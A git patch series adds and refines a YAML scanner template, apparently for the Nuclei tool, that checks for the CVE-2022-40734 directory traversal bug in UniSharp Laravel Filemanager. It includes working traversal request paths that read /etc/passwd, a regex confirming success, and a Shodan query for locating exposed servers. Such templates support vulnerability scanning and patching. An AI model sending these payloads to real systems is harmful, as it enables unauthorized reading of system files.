From 800a6fea60dd0ab4475df5788d31b79897cf93ea Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:14:40 +0530
Subject: [PATCH 1/3] Create CVE-2022-40734.yaml

---
 cves/2022/CVE-2022-40734.yaml | 28 ++++++++++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 cves/2022/CVE-2022-40734.yaml

diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml
new file mode 100644
index 0000000000..95ad0826f7
--- /dev/null
+++ b/cves/2022/CVE-2022-40734.yaml
@@ -0,0 +1,28 @@
+id: CVE-2022-40734
+
+info:
+  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal.  
+  author: arafatansari
+  severity: high
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734
+    - https://github.com/UniSharp/laravel-filemanager/issues/1150
+  description: |
+    UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files. 
+  tags: traversal,unauthenticated,laravel,unisharp,cve,2022
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+      - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200

From 0d3cbfcc36161aac3e0b08e71116cc42a666c6ca Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:23:15 +0530
Subject: [PATCH 2/3] Update CVE-2022-40734.yaml

---
 cves/2022/CVE-2022-40734.yaml | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml
index 95ad0826f7..cd78a9bacf 100644
--- a/cves/2022/CVE-2022-40734.yaml
+++ b/cves/2022/CVE-2022-40734.yaml
@@ -3,12 +3,15 @@ id: CVE-2022-40734
 info:
   name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal.  
   author: arafatansari
+  description: |
+    UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
   severity: high
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734
     - https://github.com/UniSharp/laravel-filemanager/issues/1150
-  description: |
-    UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files. 
+  metadata:
+    shodan-query: http.html:"Laravel Filemanager"
+    verified: true
   tags: traversal,unauthenticated,laravel,unisharp,cve,2022
 
 requests:

From 4f7d31b4ec188eeb048ed513b5743d27f401428e Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Thu, 15 Sep 2022 14:24:40 +0530
Subject: [PATCH 3/3] Update CVE-2022-40734.yaml

---
 cves/2022/CVE-2022-40734.yaml | 18 ++++++++----------
 1 file changed, 8 insertions(+), 10 deletions(-)

diff --git a/cves/2022/CVE-2022-40734.yaml b/cves/2022/CVE-2022-40734.yaml
index cd78a9bacf..4fae3434f1 100644
--- a/cves/2022/CVE-2022-40734.yaml
+++ b/cves/2022/CVE-2022-40734.yaml
@@ -1,18 +1,20 @@
 id: CVE-2022-40734
 
 info:
-  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal.  
+  name: UniSharp aka Laravel Filemanager v2.5.1 - Directory Traversal
   author: arafatansari
+  severity: high
   description: |
     UniSharp laravel-filemanager (aka Laravel Filemanager) through 2.5.1 allows download?working_dir=%2F.. directory traversal to read arbitrary files.
-  severity: high
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40734
     - https://github.com/UniSharp/laravel-filemanager/issues/1150
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-40734
+  classification:
+    cve-id: CVE-2022-40734
   metadata:
-    shodan-query: http.html:"Laravel Filemanager"
     verified: true
-  tags: traversal,unauthenticated,laravel,unisharp,cve,2022
+    shodan-query: http.html:"Laravel Filemanager"
+  tags: cve,cve2022,laravel,unisharp,lfi,traversal
 
 requests:
   - method: GET
@@ -20,12 +22,8 @@ requests:
       - "{{BaseURL}}/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
       - "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd"
 
-    matchers-condition: and
+    stop-at-first-match: true
     matchers:
       - type: regex
         regex:
           - "root:[x*]:0:0"
-
-      - type: status
-        status:
-          - 200